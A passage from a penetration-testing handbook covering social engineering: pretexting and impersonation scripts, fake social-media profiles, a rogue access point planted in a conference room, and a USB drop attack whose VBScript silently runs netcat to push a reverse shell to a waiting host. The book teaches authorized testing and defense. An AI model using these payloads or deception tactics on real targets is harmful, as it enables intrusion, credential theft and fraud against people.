integrated into the different operating system protocol stacks, which allows for distrib-
uted computing. The operating systems and applications must rely on these protocols
for transmission to another system or application, even if the protocols contain their
own inherent security flaws. Device drivers are developed by different vendors and in-
stalled in the operating system. Many times these drivers are not well developed and
can negatively affect the stability of an operating system. And to get even closer to the
hardware level, injection of malicious code into firmware is an up-and-coming attack
avenue.
So is it all doom and gloom? Yep, for now. Until we understand that a majority of
the successful attacks are carried out because software vendors do not integrate security
into the design and specification phases, our programmers have not been properly
taught how to code securely, vendors are not being held liable for faulty code, and con-
sumers are not willing to pay more for properly developed and tested code, our stagger-
ing hacking and company compromise statistics will only increase.
 Chapter 1: Ethics of of Ethical Hacking

21
Will it get worse before it gets better? Probably. Every industry in the world is be-
coming more reliant on software and technology. Software vendors have to carry out

PART I
the continual one-upmanship to ensure their survivability in the market. Although se-
curity is becoming more of an issue, functionality of software has always been the main
driving component of products, and it always will be. Attacks will also continue and
increase in sophistication because they are now revenue streams for individuals, com-
panies, and organized crime groups.
Will vendors integrate better security, ensure their programmers are properly trained
in secure coding practices, and put each product through more and more testing cycles?
Not until they have to. Once the market truly demands that this level of protection and
security is provided by software products and customers are willing to pay more for
security, then the vendors will step up to the plate. Currently, most vendors are only
integrating protection mechanisms because of the backlash and demand from their
customer bases. Unfortunately, just as September 11th awakened the United States to its
vulnerabilities, something large may have to take place in terms of software compro-
mise before the industry decides to address this issue properly.
So we are back to the original question: what does this have to do with ethical hack-
ing? A novice ethical hacker will use tools developed by others who have uncovered
specific vulnerabilities and methods to exploit them. A more advanced ethical hacker
will not just depend upon other people’s tools, she will have the skill set and under-
standing to look at the code itself. The more advanced ethical hacker will be able to
identify possible vulnerabilities and programming code errors and develop ways to rid
the software of these types of flaws.
If the software did not contain 5–50 exploitable bugs within every 1,000 lines of
code, we would not have to build the fortresses we are constructing today. Use this book
as a guide to bring you deeper and deeper under the covers to allow you to truly under-
stand where the security vulnerabilities reside and what should be done about them.
 Social Engineering Attacks
CHAPTER

4
Social engineering is a way to get someone to do something they wouldn’t normally do
for you, such as give you a private telephone number or internal confidential informa-
tion, by creating a false trust relationship with them. It’s no different from a common
confidence game, also known as a “con,” played by criminals the world over every day.
You could even go as far as to say that the Greek’s Trojan horse was an early act of social
engineering. That it successfully put the Greek army inside the city of Troy in mere
hours after ten years of siege had failed is worth noting. The Greeks were able to deci-
sively defeat the Trojans in one evening once inside the city wall, a theme often re-
peated on the digital battlefield today.

In this chapter, we’re going to talk about social engineering in the context of modern
information security practice. You’re going to learn how to perform social engineering
so that you are better prepared to defend against it. Like so many techniques in this
book, the only thing that separates the gray hat hacker from a common criminal is
ethical behavior. This is especially true for social engineering, as it is arguably one of the
most powerful ways to gain access to your target’s information assets.
In this chapter, we cover the following topics:

• How a social engineering attack works

• Conducting a social engineering attack
• Common attacks used in penetration testing
• Preparing yourself for face-to-face attacks
• Defending against social engineering attacks

How a Social Engineering Attack Works

Social engineering attacks cover a wide range of activities. Phishing, for instance, is a
social engineering attack (SEA). The victim receives a legitimate-looking e-mail, follows
a link to a legitimate-looking website they’re familiar with, and often divulges sensitive
information to a malicious third party. As end users are made aware of such activities,
the attacks generally must become more sophisticated in order to remain effective. Re-
cently, attacks of this nature have become narrowly targeted at specific companies, of-
ten mimicking internal system logins and targeting only individuals working at the
subject company. It’s an electronic numbers game conducted from afar, and the reason
it is so common is that it works!
77
Gray Hat Hacking, The Ethical Hacker’s Handbook, Third Edition

78
At the heart of every SEA is a human emotion, without which the attacks will not
work. Emotion is what derails security policy and practices, by leading the human user
to make an exception to the rules for what they believe is a good reason. Commonly
exploited simple emotions, and an example of how each is exploited, include:

• Greed A promise you’ll get something very valuable if you do this one thing
• Lust An offer to look at a sexy picture you just have to see
• Empathy An appeal for help from someone impersonating someone you
know
• Curiosity Notice of something you just have to know, read, or see
• Vanity Isn’t this a great picture of you?

These emotions are frequently used to get a computer user to perform a seemingly
innocuous action, such as logging into an online account or following an Internet URL
from an e-mail or instant messaging client. The actual action is one of installing mali-
cious software on their computer or divulging sensitive information.
Of course, there are more complex emotions exploited by more sophisticated social
engineers. While sending someone an instant message with a link that says “I love this
photo of you” is a straightforward appeal to their vanity, getting a secretary to fax you
an internal contact list or a tech support agent to reset a password for you is quite a dif-
ferent matter. Attacks of this nature generally attempt to exploit more complex aspects
of human behavior, such as

• A desire to be helpful “If you’re not busy, would you please copy this file
from this CD to this USB flash drive for me?” Most of us are taught from
an early age to be friendly and helpful. We take this attitude with us to the
workplace.
• Authority/conflict avoidance “If you don’t let me use the conference room
to e-mail this report to Mr. Smith, it’ll cost the company a lot of money and
you your job.” If the social engineer looks authoritative and unapproachable,
the target usually takes the easy way out by doing what’s asked of them and
avoiding a conflict.
• Social proof “Hey look, my company has a Facebook group and a lot
of people I know have joined.” If others are doing it, people feel more
comfortable doing something they wouldn’t normally do alone.

No matter what emotional button the attacker is attempting to push, the premise is
always the same: the intended victim will not sense the risk of their action or guess the
real intentions of the attacker until it’s too late or, in many cases, not at all. Because the
intended victims in these cases most often are working on computers inside of the tar-
get company network, getting them to run a remote access program or otherwise grant
you remote access directly or indirectly can be the fast track to obtaining targeted sensi-
tive data during a penetration test.
 Chapter 4: Social Engineering Attacks

79
Conducting a Social Engineering Attack
It is important to discuss with your client your intention to conduct social engineering
attacks, whether internal or external, before you include them in a penetration test’s
project scope. A planned SEA could be traumatic to employees of the target company if
they are made aware of the findings in an uncontrolled way, because they might feel
just as victimized as they would if subjected to a real attack. If you are caught during

PART II
this activity, you most likely will not be treated as if you’re “on the same team” by the
intended victim. Often, the victim feels as if they’ve been made a fool of.
The client should be made aware of the risks associated with contracting a third
party who plans to overtly lie to and manipulate company employees to do things that
are clearly against the rules. That said, most companies do accept the risk and see the
value of the exercise. Secrecy must also be stressed and agreed upon with the client
prior to engaging in a covert exercise like this. If the employees know that there will be
a test of any kind, they will of course act differently. This will prevent the penetration
testing team from truly learning anything about the subject organization’s true security
posture.
Like all penetration testing, an SEA begins with footprinting activity and reconnais-
sance. The more information you collect about the target organization, the more op-
tions become available to you. It’s not uncommon to start with zero knowledge and use
information gained through open sources to mount a simple SEA—get the company
phone directory, for instance—and then use the new knowledge to mount increasingly
targeted and sophisticated SEAs based on the newly gained insight into the company.
While dumpster diving is a classic example of a zero knowledge starting point for
finding information about a target, there are more convenient alternatives. Google is
probably the most effective way to start finding names, job titles, contact information,
and more. Once you have a list of names, start combing through social media sites such
as Facebook, LinkedIn, MySpace, and Twitter. Finding employees with accounts on
popular social media sites is a common practice among social engineers. Often, those
employees will be connected to other people they work with and so on. Depending on
their security settings, their entire network of connections may be visible to you, and
you may be able to identify coworkers easily.
In the case of business networking sites like LinkedIn, the information collection is
made even easier for you because you can search by company name to find past and
present employees of your target. On any social networking site, you may also find a
group for current and ex-employees of a company. Industry-specific blog and board sites
can also yield useful information about internal employee issues currently being dis-
cussed. Often these posts take the form of anonymous gripes, but they can be useful for
demonstrating insider knowledge when striking up a conversation with your target.
Using such passive methods to collect as much information about a company as
possible is a great place to start formulating your attack. We’ll cover some useful ways
to use social media in an actual attack scenario later in this chapter.
Social engineering is most successful as a team effort due to the wide variety of cir-
cumstances and opportunities that may arise. At the very least, two people will be needed
Gray Hat Hacking, The Ethical Hacker’s Handbook, Third Edition

80
for some of the examples detailed later in this chapter. While natural charisma is a
prized resource, a practiced phone voice and the ability to discuss convincingly a wide
variety of not necessarily technical social topics will get you pretty far down the road.
The ability to write convincingly also is important, as is your physical appearance
should you perform face-to-face attacks or impersonations. As all of these activities are
designed to gain unauthorized access to data assets, you must also possess the hacking
skills described in this book, or at least be intimately familiar with what is possible in
order to help your team get into position on the network to use them.
A good place to start your reconnaissance after researching the company online is
to begin targeting people of interest internally in an attempt to build a picture of who
is who and, if possible, develop rapport with potential sources. Key personnel might
include the CIO, CSO, Director of IT, CFO, Director of HR, VPs, and Directors of any
sort. All of these individuals will have voicemail, e-mail, secretaries, and so forth. Know-
ing who works in which offices, who their personal assistants are, and when they’re
traveling or on vacation might not seem worthwhile, but it is. Let’s say the goal is to
obtain the internal employee directory. By knowing when someone is out of the office,
you can call their assistant and claim that you are a consultant working with their boss
and that you need the company directory printed out and faxed to you at another loca-
tion within the company. Since the assistant will be faxing internally, they won’t see any
risk. At this point, they may even ask you if they can e-mail the directory to you, in
which case your SEA is a success, but let’s assume they don’t ask and fax the directory to
the other office you claim to be working in. You can then call that office, give the story
again, and ask that the fax be sent to you at home. You then give them a public fax
number and retrieve your fax.
This is a prime example of escalation of trust. The first victim felt no risk in sending
something internally. The second victim felt comfortable with the pretext because you
demonstrated knowledge of internal operations, and they don’t see any harm in pass-
ing along a directory. With the directory in hand, you can now use caller ID spoofing
services such as Bluff My Call to appear to be calling from inside the company. The next
move is up to you! If the company is like most companies, its network user IDs aren’t
hard to figure out, or maybe you’ve already figured out that format from the IT guy you
tried to sell an identity management product to on the phone or over a game of pool at
the bar you know he goes to from his overly permissive Facebook page. You can now
call tech support from inside and have a vacationing VP of HR’s password reset so you
can use the virtual private network (VPN) remotely.
Planning an attack takes time, practice, and, above all, patience. Since you’re the
attacker, you’re limited only by your imagination. Your success or failure will depend
on your team’s ability to read the people who work at the target organization and de-
vise an attack or series of escalating attacks that is effective against them. Keep in mind
that it’s a game of capture the flag, and your goal is to access sensitive data to demon-
strate to your client how it can be done. Sometimes the goal is obtained without any
traditional technical hacking, by using legitimate access methods and stolen or errone-
ously granted credentials. In other cases, a stolen backup tape will yield everything you
need. In most cases, however, it is the combined effort of getting the team hacker(s) in
position or delivering the desired remote access payload behind the network border
controls.
 Chapter 4: Social Engineering Attacks

81
As your attacks become more sophisticated, you may also be required to set up
phony websites, e-mail addresses, and phone numbers in order to appear to be a le-
gitimate company. Thanks to the proliferation of web-based micro businesses and pay-
as-you-go mobile phones, this is now as inexpensive as it is trivial. You may also be
required to meet face to face with the intended victim for certain types of attacks. We’ll
talk about these subjects in more detail in the following sections.

PART II
Reference
Bluff My Call www.bluffmycall.com

Common Attacks Used in Penetration Testing

In this section, we’re going to discuss a few formulaic SEAs that are commonly used in
everyday penetration testing. It is important to keep in mind that these attacks may not
work every time or work on your specific target, as each environment is different. In
fact, the conditions required for any attack to succeed often need to be just right; what
didn’t work today may well work tomorrow, and vice versa. The examples in the previ-
ous section are hypothetical and primarily designed to help you start thinking like a
social engineer, to give you examples of possible starting points. In the following ex-
amples, we’ll cover a few attacks that have been repeatedly performed with success. As
these attacks are part of a larger penetration test, we’ll only cover the social engineering
portion of the attack. Often the SEA is one step removed from, and immediately pre-
ceding, physical access, which is covered in Chapter 5.

The Good Samaritan

The goal of this attack is to gain remote access to a computer on the company network.
This attack combines SEA techniques with traditional hacking tools. The basic
premise is that a specially prepared USB drive is presented to the target company’s front
desk or most publicly accessible reception area. A very honest-looking person in ap-
propriate attire—a business suit if it’s an office, for example—hands the employee at
the front desk the USB drive, claiming to have found it on the ground outside. The pre-
text will change with the specific circumstances; for instance, if the office is one floor in
a high rise, you might say you found the USB drive in the elevator, or if it’s a secured
campus, you may dress like a landscaper and say you found it on the campus grounds.
The USB drive should look used, have the company name on it, and be labeled with,
for example, “HR Benefits” and the current year. What you write on the label of the key
is up to you. You’re trying to bait an employee to plug it into a computer, something
they may know they shouldn’t do, so the reward must seem greater than the risk of vio-
lating policy. It should whisper “interesting” but not be too obvious. For instance, “Cost
Cuts 2010” is a good label, but “Nude Beach” probably isn’t. When the USB drive is
plugged in, it attempts to install and run a remote access Trojan and pass a command
prompt out to your team across the public Internet. Obviously, what you have the key
run is completely up to you. In this example, we’ll focus on a very simple remote com-
mand prompt.
Gray Hat Hacking, The Ethical Hacker’s Handbook, Third Edition

82
Putting this attack together is fairly academic insofar as the main work is in the
preparation of the USB drive. The delivery is trivial and can be attempted multiple
times and at multiple target locations. For this attack to work, the target environment
must allow the use of USB drives and must have autorun enabled. Despite the fact that
these two vulnerabilities are widely known and it is considered a best practice to dis-
able or at least actively manage both, this attack is still remarkably effective. Preparing
the USB drive to autorun your payload is a fairly straightforward process as well. For
this example, you’ll need

• A USB drive; in this example, we’ll use an inexpensive SanDisk Cruzer Micro
drive.
• A tool to edit an ISO image file; in this example, we’ll use ISO Commander.
• A tool from the manufacturer to write the new ISO image to the drive; in this
example, we’ll use the SanDisk U3 Launchpad, LPInstaller.exe.
• A remote access Trojan; in this example, we’ll simply use a Windows version
of netcat.

There are prepackaged kits, such as USB Switchblade and USB Hacksaw, that do a
lot of the work for you, but they’re also widely known by antivirus companies. To re-
duce the risk of being detected, it’s better to make your own routine.
In this example, we’re going to use a 1GB SanDisk Cruzer Micro with U3 model.
Start by downloading the Launchpad Installer application, LPInstaller.exe, from the
SanDisk website. You’ll find it under the Support section by using the Find Answers
search box. This application will download the default U3 ISO image from the SanDisk
website and install it on the flash drive. We’re going to trick it into installing an ISO
image we’ve modified so that when the USB drive is plugged into the target machine, it
runs code we specify in addition to the U3 Launchpad application.
Once you have the LPInstaller.exe application downloaded, execute it. If you have
a personal firewall that operates with a white list, you may have to allow the applica-
tion access to the Internet. You
must be connected to the Inter-
net in order for the application
to download the default ISO
image from SanDisk. After the
application runs, it will require
you to plug in a compatible de-
vice before it will allow you to
continue. Once it recognizes a
compatible device, you can click
Next until you get to the final
screen before it writes the image
to the flash drive. It should look
like this:
 Chapter 4: Social Engineering Attacks

83
The moment the LPInstaller.exe application detected a compatible flash drive, it began
downloading the default U3 ISO image from the SanDisk website. This image is tempo-
rarily stored on the user PC in the Application Data section of the current user’s Docu-
ments and Setting directory in a folder called U3. The U3 folder has a temp folder that
contains a unique session folder containing the downloaded ISO file, as shown here:

PART II
You must wait until the ISO image completely downloads before you can edit it. In
this case, it’s rather small, finishing up at just over 7MB. Once it’s completely down-
loaded, we’ll use an ISO editing utility to add our own files to the ISO image before we
allow the LPInstaller application to save it to the flash drive. In this example, we’ll use
a simple ISO editing tool called ISO Commander, a copy of which can be freely down-
loaded from the location specified at the end of this section. Open ISO Commander,
navigate to the U3 data directory, and select the downloaded ISO file, which is Pelican-
BFG-autorun.iso in this case. Since we’ll need to install our own version of autorun.inf,
it’s convenient to simply extract and modify the autorun.inf file that came with the ISO
image. Simply right-click the autorun.inf file and select Extract, as shown next, and then
save it to another location for editing.
Gray Hat Hacking, The Ethical Hacker’s Handbook, Third Edition

84
Extracting the default autorun.inf file is simple and contains only a few directives.
In this example, we will replace the executable call with a script of our own. Our script
will perform an attack using netcat to push a command shell to a remote computer,
and then execute the originally specified program, LaunchU3.exe, so that the user won’t
notice any abnormal behavior when they plug the USB drive in. The unedited autorun.
inf file is as follows:
[AutoRun]
open=wscript LaunchU3.exe -a
icon=LaunchU3.exe,0
action=Run U3 Launchpad
[Definitions]
Launchpad=LaunchPad.exe
Vtype=2
[CopyFiles]
FileNumber=1
File1=LaunchPad.zip
[Update]
URL=http://u3.sandisk.com/download/lp_installer.asp?custom=1.6.1.2&brand=PelicanBFG
[Comment]
brand=PelicanBFG

For our purposes, we’ll only edit the second line of this file and change it from
open=wscript LaunchU3.exe -a

to
open=wscript cruzer/go.vbs

When the autorun.inf file is executed on insertion of the device, our go.vbs script
will run instead of the LaunchU3.exe application. We’ll put it in a directory called cru-
zer along with the netcat binary nc.exe in an attempt to make it slightly less noticeable
at a casual glance. Next we need to create our go.vbs script. Since we’re just demonstrat-
ing the technique, we’ll keep it very simple, as shown next. The script will copy the
netcat binary to the Windows temp directory and then execute the netcat command
with options to bind a cmd.exe command shell and pass it to a remote computer.
'This prevents the script from throwing errors in the event it has trouble
On Error Resume Next
set objShell = WScript.CreateObject("WScript.Shell")
'Get the location of the temp directory
temp=objShell.ExpandEnvironmentStrings("%temp%")
'Get the location of the Windows Directory
windir=objShell.ExpandEnvironmentStrings("%windir%")
set filesys=CreateObject("Scripting.FileSystemObject")
'Copy our netcat into the temp directory of the target
filesys.CopyFile "cruzer\nc.exe", temp & "\"
'Wait to make sure the operation completes
WScript.Sleep 5000
'Throw a command prompt to the waiting remote computer, a local test in this case.
'The 0 at the end of the line specifies that the command box NOT be displayed to
'the user.
objShell.Run temp & "\nc.exe -e " & windir & "\system32\cmd.exe 192.168.1.106
443",0
'Execute the application originally specified in the autorun.inf file
objShell.Run "LaunchU3.exe -a"
 Chapter 4: Social Engineering Attacks

85
The preceding script is documented step by step in the comments. VBScript is used
as opposed to batch files because it gives more control over what the user sees on the
screen. This example is configured to run silently even if it encounters multiple errors
and cannot continue. It uses Windows environment variables to determine where the
Windows directory is so that it can easily find the command shell binary cmd.exe on
multiple versions of Windows. It uses the same technique to determine the default
Window temp directory.

PART II
Now that we have our autorun.inf file modified and our go.vbs script written, it’s
time to put them into the ISO file the LPInstaller application is about to write to the
flash drive. Using the ISO Commander application with the LPInstaller ISO file still
open, drag and drop the edited autorun.inf file into the root of the image file system.
Then, using either a right-click, the toolbar, or pull-down menus, create a new folder
named cruzer. In ISO Commander, each method creates a folder titled New Folder,
which must be renamed. Drag and drop the go.vbs and nc.exe files into the cruzer di-
rectory, save your changes, and exit ISO Commander before continuing.
Continue by clicking the Next button on the LPInstaller application, and the edited
ISO image will be written to the flash drive. In the preceding example, an IP address is
specified in the local network for testing purposes. From the command prompt on the
machine that will receive the command shell from the target machine, instruct netcat
to listen on TCP port 443 as follows:
C:\nc -l -p 443

Port 443 is a common port to use as it is difficult to proxy and monitor, as the legiti-
mate traffic that would typically flow over it is encrypted. If everything works, you will
receive a command prompt with the drive letter that the U3 file system was assigned by
the target machine when it was inserted, as shown here:

This example used very simple tools to create a remote access Trojan. In reality, the
attack contained on the USB drive can be vastly more complex and stealthy. Once you
are comfortable making and writing your own ISO images to the flash drive, you can
experiment with more complex payloads. It’s even possible to create a Trojan execut-
able to replace the LaunchU3.exe application in the event the user has autorun turned
Gray Hat Hacking, The Ethical Hacker’s Handbook, Third Edition

86
off but still wants to use the U3 features. Alternatively, you can place on the USB device
a document file with an appealing name that contains an exploit, in an attempt to en-
tice the target to open it. As with most gray hat attacks, this one is limited only by your
imagination.

The Meeting
The goal of this attack is to place an unauthorized wireless access point (WAP) on the
corporate network.
This attack requires face-to-face contact with the target. A pretext for a meeting is
required, such as a desire to purchase goods or services on a level that requires a face-
to-face meeting. Set the meeting time for just after lunch and arrive about 30 to 45
minutes before your meeting, with the goal of catching your victim away at lunch. Ex-
plain to the receptionist that you have a meeting scheduled after lunch but were in the
area on other business and decided to come early. Ask whether it is okay to wait for the
person to return from lunch. Have an accomplice phone you shortly after you enter the
building, act slightly flustered after you answer your phone, and ask the receptionist if
there is some place you can take your call privately. Most likely you’ll be offered a con-
ference room. Once inside the conference room, close the door, find a wall jack, and
install your wireless access point. Have some Velcro or double-sided sticky tape handy
to secure it out of view (behind a piece of furniture, for instance) and a good length of
cable to wire it into the network. If you have time, you may also want to clone the MAC
address of a computer in the room and then wire that computer into your access point
in the event they’re using port-level access control. This ruse should provide enough
time to set up the access point. Be prepared to stay in the room until you receive con-
firmation from your team that the access point is working and they have access to the
network. Once you receive notification that they have access, inform the receptionist
that an emergency has arisen and that you’ll call to reschedule your appointment.
The beauty of this attack is that it is often successful and usually only exposes one
team member to a single target employee, a receptionist in most cases. It’s low tech and
inexpensive as well.
In our example, we’re going to use a Linksys Wireless Access Point and configure it
for MAC cloning. For this example, you’ll need

• A Linksys Wireless Access Point

• Double-sided Velcro tape or sticky tape
• A 12-inch or longer CAT5 patch cable

Have the WAP ready with double-sided tape already stuck to the desired mounting
surface. You’ll want to be prepared for unexpected configuration problems such as a
long distance between the network wall jack or power outlet and a suitable hiding
place. A few simple tools such as a screwdriver, utility knife, and duct tape will help you
deal with unexpected challenges. It’s also wise to have any adapters you may need. De-
pending on which area of the country you’re working in, some older buildings may not
have grounded outlets, in which case you’ll need an adaptor. In addition to physical
 Chapter 4: Social Engineering Attacks

87
tools, you’ll want to bring along a flash drive and a bootable Linux Live CD or bootable
flash drive loaded with Knoppix or Ubuntu in case there is a computer in the confer-
ence room (there usually is).
Once you’re inside the conference room with the door closed, determine if there is
a computer in the room. If there is, unplug its network cable and attempt to boot it
from the CD or a flash drive. If you’re successful, plug it into the wireless router and
allow it to receive an IP from the DHCP controller. Using the browser from the Linux

PART II
Live CD, go to the WAP IP address—typically this is 192.168.1.1 by default for most
configurations. In our example, we’ll use a Linksys Wireless-G Broadband Router. From
the Setup tab, select Mac Address Clone and enable it, as shown next. Most WAPs give
you the option to automatically determine the MAC address of the machine you’re cur-
rently connecting from.

Once set, save your settings. If the WAP you’re using does not offer an option to
automatically determine the MAC address, simply run ifconfig from the Linux com-
mand prompt and the MAC address of each interface on the system will be displayed.
If you’re working from Windows, ipconfig /all will display a similar list. In either case,
you’ll have to determine the active interface and manually enter the MAC address dis-
played into the dialog box.
Once the MAC is cloned, plug the WAP into the wall network jack the PC used to be
in so that the WAP is in between the PC and the network wall jack. To the network it
appears as if the computer is still connected to the network. Some infrastructures have
network port-level security and will notice a new MAC address. By using MAC cloning,
you are less likely to be noticed initially connecting to the network, but because you’ve
put the conference room computer behind a NAT router, you may have limited access
to it from the local network, which could lead to eventual discovery.
Next, have a member of your team confirm that the WAP can be connected to from
outside the building and that the corporate network is visible. While you still have the
conference room PC booted from the Linux Live CD, grab a copy of the SAM file for
Gray Hat Hacking, The Ethical Hacker’s Handbook, Third Edition

88
later cracking, as described in Chapter 8. If all goes well, you now have access to the
internal network from nearby, so tell the receptionist you’ll call to reschedule your ap-
pointment and leave. If your team cannot get onto the internal network, take every-
thing with you. It’s not going to suddenly start working, and leaving anything behind
could lead to being prematurely discovered.

Join the Company

In this attack, we’ll use social media to attract employees of the target company to join
our social networking group. The goal of the attack is to learn enough about the em-
ployees of the target company to successfully impersonate one well enough to gain
physical access.
As mentioned earlier in the chapter, employees of a specific company are often eas-
ily identified on business social networking sites like LinkedIn. By searching and find-
ing employees of the target company, it may be possible to get them to associate with
you on the site. One simple way to do that is to create a fake profile claiming to work
at the same company and then send invitations to every user you can find that cur-
rently works or formerly worked at the target company. It may be slow going at first, but
once a few of them accept your invitation, perhaps out of a desire to increase the num-
ber of their own connections, it will legitimize you to others in the organization. Once
connected to them, you can follow their posts and gain access to more details about
them, including what specifically they do and who they’re associated with. You can
now also communicate directly with them through the site’s messaging system. An-
other way to associate with a group of employees is to create a group for the target
company and send invitations to people you’ve identified as employees. The more peo-
ple that join, the faster other people will join. Soon you will have access to quite a few
employees as well as know who they associate with.
Once you have a large enough group and enough information about associations,
you will have multiple opportunities at your disposal. We’ll focus on just one: imper-
sonating someone. To start with, you should learn which employees work at which fa-
cilities. Extensions, direct dial phone numbers, and mobile numbers can be a big help
in this case as well. If possible, you’ll want to select someone that is away from the of-
fice, perhaps even on vacation. On a social media site, it’s not hard to get people to talk
about such things; you can just ask, or even start a topic thread on, where people are
planning to vacation. Most people are more than happy to talk about it. If possible,
target someone who looks similar to the person on your team you’ll be sending into
the company.
A good pretext for getting into the company is that you’re traveling, some urgent
business has come up, and you need temporary access to do some work because the
files you need are not accessible from outside the company network. Another possible
pretext is that you’re going to be in the area on a specific date and would like to stop in
to do some work for a few hours. This is an especially powerful pretext if you use a
spoofed caller ID to call in the request from your “boss” to security for access. In one
recent case reported by a penetration tester, corporate security issued temporary access
credentials based on a similar pretext and fake ID badge. Creating a fake ID badge will
be covered in greater detail in Chapter 5.
 Chapter 4: Social Engineering Attacks

89
This attack requires nothing but knowledge of social media sites and some time to
get to know the people you connect with at your target company. By selecting a subject
who you know is away from the office, you can create a window of opportunity to im-
personate them in their absence—usually more than enough time to achieve your ob-
jective once you have physical access to the data network. By being knowledgeable and
conversant in company matters with the information you’ve collected from your social
media assets, you can easily build rapport and trust with the employees at the target

PART II
company online and in person while onsite.
As this is a straightforward information-gathering attack on a company, we’ll use
LinkedIn as an example. LinkedIn allows a user to search by company name. Any Linked-
In user who currently or formerly worked at the target and associated themselves with
the company name in their profile will be listed in the search results. We can then nar-
row the search by country, state, or region to more narrowly target individuals who
work at the division or facility we’re interested in. Once we’ve created a list of targets,
we can search for the same individuals using other social media sites—Facebook, for
example. Infiltrating multiple social networks and targeting individuals working for or
associated with the target company will yield a lot of valuable intelligence. Using this
information with the scenarios described in this section can provide the social engineer
with ample attack opportunities.

References
ISO Commander www.isocommander.com
Knoppix www.knoppix.com
U3 Launchpad Installer http://mp3support.sandisk.com/downloads/
LPInstaller.exe
Ubuntu www.ubuntu.com
Windows Netcat www.securityfocus.com/tools/139

Preparing Yourself for Face-to-Face Attacks

It’s one thing to send an e-mail to or chat with someone online during a SEA, but it’s
quite another to meet face to face with them, or even speak to them on the phone for
that matter. When working online, you can make your attempt and then sit back and
see if you get a result. When you’re face to face, you never know what the other person
is going to say, so you simply must be prepared for anything, including the worst. In
order to successfully mount a face-to-face SEA, you must not only look the part you’re
playing, but also appear as comfortable as you would if you were having a relaxed con-
versation with a friend. Ideally you want your attitude to put people at ease. This is
easier said than done; walking across a wooden plank is easy when it’s on the ground,
but put it 50 feet in the air and suddenly it’s quite difficult—not because the physical
actions are any different, but because your mind is now acutely aware of the risk of fall-
ing. To your body, it’s the same. In social engineering, you may experience many differ-
ent emotions, from fear to exhilaration. To achieve your goal, you’re lying to and de-
ceiving people who are probably being nice and even helpful to you. It can be extremely
stressful.
Gray Hat Hacking, The Ethical Hacker’s Handbook, Third Edition

90
If you appear nervous, you will be less convincing. People are more likely to ques-
tion you when you appear out of place or uncomfortable; it will get you noticed for all
the wrong reasons. Maintaining calm while attempting to deceive someone might not
come naturally or easily for you depending on your personality and life experience. It
can be learned, however. The most useful metric for determining how calm you are is
your heart rate. During a face-to-face encounter with your subject or subjects, you will
most likely experience an increase in adrenaline. This is due to a natural fight-or-flight
response to what your mind perceives as a possible conflict or confrontation. This will
elevate your heart rate and make your palms and/or face sweat, which may make you
look nervous. Looking nervous is a bad thing for a social engineer who is trying to con-
vince someone they belong and that everything is normal.
In order to consciously manage this response, you must start by knowing your rest-
ing heart rate. An easy way to determine this is to purchase an inexpensive wrist heart
rate monitor such as a Mio Watch. The most accurate way to determine your resting
heart rate is to take your pulse when you first wake up but haven’t gotten out of bed.
When you’re conversing with a face-to-face target, you’ll want to be within about
20 percent of your resting heart rate to look comfortable. That means if your resting
heart rate is 65 beats per minute (bpm), it shouldn’t get over 80 bpm or you’ll start to
appear nervous. Often, an inexperienced social engineer will have a heart rate of 120 bpm
or more during their first face-to-face attempts. This is especially true with physical
penetrations, which are described in Chapter 5.
You can learn to manage your heart rate using basic relaxation techniques such as
meditation, acupressure, and reflexology. Find a technique that works for you, practice
it, and use it just prior to executing your SEA. You can also try to retrain or desensitize
your instinctive conflict response. Try this exercise: As you walk in public and encounter
people, look them directly in the eye and hold eye contact with them until they break
it or you move past them. Don’t stare like a psychopath, but try not to smile or look
threatening, either; just hold eye contact. Your heart rate will likely elevate in early
trials, but over time this will become easier and your body won’t respond as strongly to
it. Keep in mind that this type of eye contact is a primal human dominance posture and
could elicit an angry response. If confronted, simply and apologetically explain that
you thought you knew the person but weren’t sure. Over time you will gain more con-
trol over your responses and reactions to conflict. You will be able to remain calm and
act naturally when confronting a target or being confronted.
You should also practice any discrete components of your attack plan multiple
times prior to execution. The more times you repeat something, the more likely you’ll
be comfortable saying it one more time. It’s advisable to have a base script to work from
and then deviate as circumstances necessitate. Rehearsing as a team also helps. The
more possible deviations you can think of ahead of time, the more relaxed and pre-
pared you’ll be when the time comes for you to meet your target face to face.
In addition to rehearsing what you’ll say, rehearse what you’ll have with you—a
computer bag, for instance, or maybe your lunch. Think about how you’ll hold it. A
common beginner mistake is to not have something to do with their hands. It seems like
something you shouldn’t have to think about, but when you feel self-conscience, you
often forget what to do with your hands, and awkward movements can make you look
 Chapter 4: Social Engineering Attacks

91
very nervous. If in doubt, make sure you have things to hold, or simply think about
where to put your hands in advance. Practice standing with your hands in your desired
pose in front of a mirror, find positions that look best for you, and practice them.
Another common nervous response brought on by the fight-or-flight instinct is ex-
cess salivation. This can make you swallow nervously while you’re trying to talk but can
be easily remedied with chewing gum, a breath mint, or hard candy, any of which will
keep your salivation more or less constant during the stressful part of your encounter

PART II
with your target.

Reference
Mio Heart Monitor http://mioglobal.com

Defending Against Social Engineering Attacks

Hardening your environment to withstand SEAs, especially targeted ones, is more a
matter of training than a traditional security control. An SEA goes right to the most
vulnerable point in a company’s defenses: its employees. For the reasons discussed in
the preceding sections, people make decisions daily that impact or even compromise
implemented security measures. Every con man knows that there is a combination of
words or actions that will get almost anyone to unknowingly perform an action or re-
veal information they shouldn’t. This is because most people do not perceive the risk of
their actions. Failure to perceive the risk until it is too late is at the heart of most SEAs.
A bank teller knows that they are working in an environment that requires security
and vigilance. They probably don’t have to be reminded of the threat of robbery; they
are aware of it and understand the risk of being robbed is very real. Unfortunately, the
level of awareness is not the same in most corporate environments. Employees typi-
cally perceive the threat of an SEA to be hypothetical and unlikely, even if they’ve been
victimized in the past. This has to do with the perceived value of information assets.
Money has an overt value, whereas information and data do not.
The best defense against SEAs is awareness training and simulated targeted attacks.
A comprehensive program will help employees recognize the value of the assets being
protected as well as the costs associated with a breach. The program should also give
real-world attack examples that demonstrate the threat. In conjunction with awareness
training, simulated attacks should be regularly performed in an attempt to determine
the effectiveness of the awareness program. Results can then be fed back into the pro-
cess and included in ongoing awareness training.
This page intentionally left blank